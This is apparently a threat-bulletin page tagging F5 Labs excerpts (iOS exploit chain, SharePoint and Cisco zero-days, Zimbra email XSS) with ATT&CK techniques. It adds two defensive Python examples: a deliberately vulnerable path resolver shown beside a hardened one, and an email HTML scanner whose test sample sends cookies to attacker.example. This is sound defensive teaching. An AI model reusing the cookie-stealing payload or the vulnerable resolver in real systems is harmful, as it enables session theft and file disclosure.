TTPwire Vol. 1 · MITRE ATT&CK·Tagged


F5 Labs

Weekly Threat Bulletin – March 25th, 2026

2026-03-25

ATT&CK techniques detected

17 predictions
T1190 Exploit Public-Facing Application
98%
“…_kit_steals_iphone/ CISA warns of active exploitation of Microsoft SharePoint vulnerability (CVE-2026-20963) CVE-2026-20963, a remote code execution (RCE) vulnerability affecting Microsoft SharePoint, is currently under active exploitation. The US Cybersecurity …”
T1190 Exploit Public-Facing Application
92%
“…e-2026-20963-exploited/ https://www.hendryadrian.com/cisa-warns-of-attacks-exploiting-recent-sharepoint-vulnerability/ https://www.theregister.com/2026/03/19/unknown_attackers_exploit_yet_another/ Ransomware gang exploits Cis…”
T1556.006 Multi-Factor Authentication
87%
“…phishing-resistant multi-factor authentication (MFA), such as FIDO2 or WebAuthn, for all user-facing applications, especially for externally accessible services like webmail, to mitigate the risk of credential and session theft. - Conduct a strategic review of the organiz…”
T1190 Exploit Public-Facing Application
86%
“…service account and application pool identity permissions, ensuring they have the absolute minimum privileges required to function and cannot access non-essential systems or data. - Review and strengthen the existing patch management policy to enforce shorter deployment timelin…”
T1068 Exploitation for Privilege Escalation
76%
“…), culminating in local privilege escalation through a kernel-mode race condition (CVE-2025-43520). Successful compromises deploy malware families such as GhostKnife (a JavaScript backdoor for data exfiltration and device control), GhostSaber (a JavaScript backdoor for…”
T1190 Exploit Public-Facing Application
73%
“…only permit access from authorized administrator workstations. - Establish and enforce a patch management policy that defines specific service-level agreements (SLAs) for identifying, testing, and deploying critical security updates for network infrastructure devices like uni…”
T1204.002 Malicious File
56%
“…files and endpoint data for the GhostKnife, GhostSaber, and GhostBlade malware families. Compliance best practices - Establish and enforce a formal mobile device patch management policy that mandates the installation of security updates for all corporate and BYOD iOS devices with…”
T1588.006 Vulnerabilities
52%
“…access trojan, has claimed responsibility for attacks on entities such as DaVita, Kettering Health, the Texas Tech University System, and the City of Saint Paul, Minnesota, and has recently deployed a new malware strain called Slopoly. This incident follows several other Cisco ze…”
T1588.006 Vulnerabilities
46%
“…/threat-intelligence/darksword-ios-exploit-chain/ https://cyberpress.org/new-ios-exploit-uses-advanced-iphone-hacking/ https://gbhackers.com/new-ios-exploit-uses-advanced-iphone-hacking-tools/ https://thecyberexpress.com …”
T1566.002 Spearphishing Link
46%
“…the HTML body of a single email, disguised as a routine internship inquiry, rather than utilizing malicious attachments or links. Upon opening the email in an active Zimbra session, the code silently executed in the victim's browser, enabling the attackers to harvest sensitive …”
T1587.004 Exploits
45%
“Weekly Threat Bulletin – March 25th, 2026 The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors A new iOS full-chain exploit, dubbed DarkSword, has been identified, leveraging six zero-day vulnerabilities to fully compromise devices running iOS …”
T1204.002 Malicious File
41%
“Weekly Threat Bulletin – March 25th, 2026 The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors A new iOS full-chain exploit, dubbed DarkSword, has been identified, leveraging six zero-day vulnerabilities to fully compromise devices running iOS …”
T1204.002 Malicious File
38%
“…/threat-intelligence/darksword-ios-exploit-chain/ https://cyberpress.org/new-ios-exploit-uses-advanced-iphone-hacking/ https://gbhackers.com/new-ios-exploit-uses-advanced-iphone-hacking-tools/ https://thecyberexpress.com …”
T1190 Exploit Public-Facing Application
38%
“…network application ecosystem. The most severe, CVE-2026-22557, is a path traversal vulnerability rated 10.0 CVSS, allowing unauthenticated attackers to access and manipulate underlying system files without prior privileges or user interaction, potentially leading to full co…”
T1190 Exploit Public-Facing Application
33%
“…fmc.html https://www.hendryadrian.com/interlock-ransomware-leveraged-cisco-fmc-zero-day-36-days-before-patch/ https://www.hendryadrian.com/ransom-delta-manufacturing-mar-2026/ https://www.hendryadrian.com/ransom-elliott-l…”
T1587.004 Exploits
32%
“…to ensure a timely and complete restoration of critical systems in the event of a successful ransomware attack. - Develop and implement a formal vulnerability management program that includes rapid risk assessment and defined service-level agreements (SLAs) for patching criti…”
T1588.006 Vulnerabilities
30%
“…fmc.html https://www.hendryadrian.com/interlock-ransomware-leveraged-cisco-fmc-zero-day-36-days-before-patch/ https://www.hendryadrian.com/ransom-delta-manufacturing-mar-2026/ https://www.hendryadrian.com/ransom-elliott-l…”
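The bulletin excerpt tagged T1190 at 38% describes the bug class behind CVE-2026-22557: an unauthenticated path traversal that reaches underlying system files. The following is an added example, not code from F5 Labs or from the affected product, showing the naive path resolver that produces that bug beside a hardened one, with a constructed web root and a secret file next to it so the difference can be observed on real requests. The file names, the `demo` helper and the set of request strings are assumptions made for illustration.

```python
"""Path traversal in a file-serving handler: the naive resolver beside a hardened one.

Added example for the bug class the bulletin attributes to CVE-2026-22557; it is not
F5 Labs code and not code from the affected product. The directory layout is constructed.
"""
import os
import tempfile


def vulnerable_resolve(root: str, requested: str) -> str:
    """Naive join: '../' segments walk out of root, and an absolute request discards
    root entirely (os.path.join(root, '/etc/passwd') == '/etc/passwd')."""
    return os.path.join(root, requested)


def _inside(root_real: str, path: str) -> bool:
    """True when path is root_real itself or a descendant of it. commonpath also
    stops '/srv/www-private' from passing as a child of '/srv/www'."""
    return os.path.commonpath([root_real, path]) == root_real


def hardened_resolve(root: str, requested: str) -> str:
    """Return a canonical path inside root, or raise ValueError.

    Assumes the caller has already URL-decoded `requested` exactly once; decoding it
    again here would reintroduce double-encoding bypasses.
    """
    root_real = os.path.realpath(root)
    if "\x00" in requested or os.path.isabs(requested):
        raise ValueError("rejected: NUL byte or absolute path")
    # realpath collapses '..' segments and follows symlinks, so a link inside root
    # that points outside is caught by the containment check as well.
    candidate = os.path.realpath(os.path.join(root_real, requested))
    if not _inside(root_real, candidate):
        raise ValueError(f"rejected: {requested!r} escapes {root_real}")
    return candidate


def demo(requests=("index.html", "sub/../index.html", "../secret.txt",
                   "/etc/passwd", "sub/../../secret.txt")) -> dict:
    """Build a constructed web root with a secret file beside it and report, per
    request, whether the naive resolver escapes root and what the hardened one decides."""
    report = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "www")
        os.makedirs(os.path.join(root, "sub"))
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write("<h1>public</h1>")
        with open(os.path.join(base, "secret.txt"), "w") as fh:
            fh.write("constructed secret outside the web root")
        root_real = os.path.realpath(root)
        for req in requests:
            naive = os.path.realpath(vulnerable_resolve(root, req))
            escapes = not _inside(root_real, naive)
            try:
                hardened_resolve(root, req)
                verdict = "allowed"
            except ValueError:
                verdict = "rejected"
            report[req] = (escapes, verdict)
    return report


if __name__ == "__main__":
    for req, (escapes, verdict) in demo().items():
        print(f"{req!r:24} naive escapes root: {escapes!s:5}  hardened: {verdict}")
```

Note that `sub/../index.html` is allowed by the hardened resolver: the check is on the canonical result, not on the presence of `..`, so legitimate clients that normalise paths are not broken while every request that resolves outside the root is refused.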
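The excerpt tagged T1566.002 describes code carried in the HTML body of an email that ran in the reader's active Zimbra session, with no attachment and no link to click. As an added example, not F5 Labs code and not Zimbra's own sanitizer, the scanner below flags the HTML constructs that make that possible (script and embedding elements, `on*` event handlers, `javascript:`/`data:` URLs, meta refresh) and runs over two constructed messages: a benign internship inquiry and the same text with an `onerror` payload and an entity-encoded `javascript:` link. The payload, the domain `attacker.example` and the sample messages are constructed for illustration.

```python
"""Flag active content in the HTML body of an email.

Added example for the delivery technique described in the Zimbra incident; it is not
F5 Labs code and not Zimbra's sanitizer. It is a gate for a mail filter or webmail
sanitizer, not a full HTML sanitizer. Both sample messages below are constructed.
"""
from html.parser import HTMLParser

# Elements that execute, embed, or rewrite the document on their own.
ACTIVE_TAGS = {"script", "iframe", "frame", "object", "embed", "base"}
# Attributes that take a URL and can therefore carry a script scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "poster"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


def _normalised_scheme(value: str) -> str:
    # Browsers ignore whitespace and control characters inside the scheme, so
    # 'java\tscript:' and ' javascript:' both run; strip them before comparing.
    return "".join(ch for ch in value if not ch.isspace() and ord(ch) > 31).lower()


class ActiveContentScanner(HTMLParser):
    """Collects one finding per dangerous element or attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser decodes character references in attribute values, so an
        # obfuscated 'jav&#x61;script:' arrives here as 'javascript:'.
        tag = tag.lower()
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active element <{tag}>")
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and value and \
                    _normalised_scheme(value).startswith(DANGEROUS_SCHEMES):
                self.findings.append(f"{name} with script URL on <{tag}>")
            elif tag == "meta" and name == "http-equiv" and value \
                    and value.strip().lower() == "refresh":
                self.findings.append("meta refresh redirect")


def scan_html_body(html: str) -> list[str]:
    """Return the list of findings for one HTML message body (empty means clean)."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a routine internship inquiry with an ordinary https link.
BENIGN = (
    "<p>Hello, I am a final-year student and would like to ask whether you "
    "offer summer internships.</p>"
    "<p>My CV: <a href='https://example.com/cv.pdf'>cv.pdf</a></p>"
)

# Constructed sample: same text, plus a broken image whose onerror handler runs
# in the reader's webmail session and an entity-encoded javascript: link.
MALICIOUS = (
    "<p>Hello, I am a final-year student and would like to ask whether you "
    "offer summer internships.</p>"
    "<img src=x onerror=\"fetch('https://attacker.example/c?'+document.cookie)\">"
    "<a href='jav&#x61;script:void(0)'>details</a>"
)


if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_html_body(body) or "clean")
```

The check deliberately works on the parsed tree rather than on regular expressions over the raw text, which is why the entity-encoded link is still caught; a filter that string-matches `javascript:` would miss it.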

Summary

These are the top threats you should know about this week.